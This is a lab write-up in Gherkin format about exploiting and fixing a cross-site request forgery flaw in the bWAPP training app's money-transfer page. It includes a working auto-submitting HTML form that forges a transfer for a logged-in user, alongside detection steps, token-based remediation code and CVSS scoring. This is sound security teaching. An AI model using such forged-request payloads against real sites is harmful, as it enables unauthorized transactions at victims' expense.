## Version 1.4.0
## language: en

Feature:
  TOE:
    bWAPP
  Category
    A8 - Cross-Site Request Forgery (CSRF)
  Page name:
    bWAPP/csrf_2.php
  CWE:
    CWE-352: XSRF
  Goal:
    Forge a malicious request and execute it with a logged user
  Recommendation:
    Implement CSRF tokens

  Background:
  Hacker's software:
    | <Name>                       | <Version>          |
    | Kali GNU/Linux               | 4.18.0-kali1-amd64 |
    | Firefox Quantum              | 60.2.0             |
    | Burp Suite Community Edition | 1.7.36             |
  TOE information:
    Given I am accessing the site bWAPP/csrf_2.php
    And enter a php site that allows me to make money transfers
    And the site is running on bee-box 1.6.7 in Virtualbox 5.2.18:
    """
    Ubuntu 8.04, kernel=2.6.24-16-generic, MySQL 5.0.99, Apache 2.2.8, PHP 5.2.4
    """
    And the site is running on low security_level


  Scenario: Normal use case
  Making a transaction
    Given I access the site
    And I see I have "1000 EUR" in my account
    And fill the "Account to transfer:" textfield with "123-456"
    And fill the "Amount to transfer" textfield with "50"
    And click on "Transfer"
    Then the page reloads and I see I have "950 EUR"

  Scenario: Static detection
  The code does not implement CSRF validation like CSRF tokens
    When I look at the code on bWAPP/csrf_2.php
    Then I can see the vulnerability from lines 23 to 26
    And it is caused due to the lack of a anti CSRF validations
    """
    23  if(isset($_GET["amount"])) {
    24      if(($_COOKIE["security_level"] != "1" && \
            $_COOKIE["security_level"] != "2")) {
    25          $_SESSION["amount"] = $_SESSION["amount"] - $_GET["amount"];
    26      }
    ... #Unimportant lines
    """
    Then bulding a CSRF script for ordering tickets is possible

  Scenario: Dynamic detection
  Validation token missing
    Given I am listening with Burp
    And I access the site
    And order transfer "50 EUR" to "123-456"
    Then I intercept the following request:
    """
    GET /bWAPP/csrf_2.php?account=123-456&amount=50&action=transfer HTTP/1.1
    ... #Unimportant lines
    Cookie: security_level=0; has_js=1; \
    PHPSESSID=d2cbcfe645069bd7db98b336f42b9557
    ... #Unimportant lines
    """
    Then I can conclude that no token parameter is being required for the GET
    And building a CSRF script for ordering tickets is possible

  Scenario: Exploitation
  Sending a link to a bWAPP user and making him purchase tickets for me
    Given I already know I can build a CSRF attack
    Then I proceed to build the following script:
    """
    <body onload="document.forms[0].submit()">
      <form method="GET" enctype="application/x-www-form-urlencoded"
      action="http://192.168.56.101/bWAPP/csrf_2.php"/>
        <input type="hidden" name="account" value="123-456" />
        <input type="hidden" name="amount" value="5" />
        <input type="hidden" name="action" value="transfer" />
    </body>
    """
    And save my malicious script in "jsfiddle.net"
    And get a link for executing in "http://jsfiddle.net/8htk2357/18/"
    Then I send the link to a victim which in this case will be myself
    When I open the malicious link logged as bee
    Then I get instantly redirected to the bWAPP site
    And the 5 EUR have been already deducted from my account
    Then I can conclude that the malicious link executed the script
    And redirected me to bWAPP
    And automatically transfered the money
    And I would be able to make any user to transfer money to any bank account

  Scenario: Remediation
  Implementing CSRF tokens
    Given I know that csrf_2.php is vulnerable to CSRFs
    Then I create two functions in /var/www/bWAPP/functions_external.php:
    """
    622  function get_csrf_token() {
    623      if(isset($_SESSION['token'])) {
    624          return $_SESSION['token'];
    625      } else {
    626          $token = bin2hex(openssl_random_pseudo_bytes(16));
    627          $_SESSION['token'] = $token;
    628          return $token;
    629      }
    630  }
    631
    632  function validate_csrf_token($token) {
    633      if ($token == get_csrf_token()) {
    634          return true;
    635      } else {
    636          return false;
    637      }
    638  }
    """
    Then these functions will allow me to create and validate tokens in the blog
    Then I modify the code in /var/www/bWAPP/csrf_2.php
    And include functions_external.php
    And create an "$original_token" value on line 24
    And such value stores a token when the user visits the blog
    And try to create an "$inserted_token" from lines 25 to 27
    And such value comes from any GET request made to the blog
    And create an additional HTML input on line 115 for GET requests
    And such input creates a new token if there is none or recycles the old one
    Then I create a condition on lines 31 to 33
    And such condition checks if "$original_token" and "$inserted_token" differ
    Then if they differ it means that the user never went through the site
    And never obtained an "$original_token"
    Then the GET request is likely to be a CSRF attack
    And the POST request is invalidated by printing $message on line 112
    """
    22  include("functions_external.php");
    23
    24  $original_token = get_csrf_token();
    25  if(isset($_REQUEST["token"])) {
    26      $inserted_token = $_REQUEST["token"];
    27  }
    28
    29  if(isset($_GET["amount"])) {
    30      if(($_COOKIE["security_level"] != "1" && \
            $_COOKIE["security_level"] != "2")) {
    31          if (! validate_csrf_token($inserted_token)) {
    32              $message =  \
                    "<font color=\"red\">CSRF Detected and stopped.</font>";
    33          }
    34          else {
    35              $_SESSION["amount"] = $_SESSION["amount"] - $_GET["amount"];
    36          }
    37      }
    ... #Unimportant lines
    111  <p>Amount on your account: <b> \
         <?php echo $_SESSION["amount"] ?> EUR</b></p>
    112  <?php echo $message ?>
    112
    114  <form action="<?php echo($_SERVER["SCRIPT_NAME"]);?>" method="GET">
    115
    116      <input type="hidden" name="token" \
             value="<?php echo get_csrf_token(); ?>"/>
    """
    Then after making all these changes
    Then I try the previous malicious script for bank transfers
    And get the following message:
    """
    CSRF Detected and stopped.
    """
    And the script fails to trigger the transaction
    Then I also try to manually make a transaction as a normal user would do
    And it works correctly
    Then the the vulnerability is patched and CSRF attacks are not possible

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    4.2/10 (Medium) - AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.1/10 (Medium) - E:H/RL:W/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    3.0/10 (Low) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2018-11-16
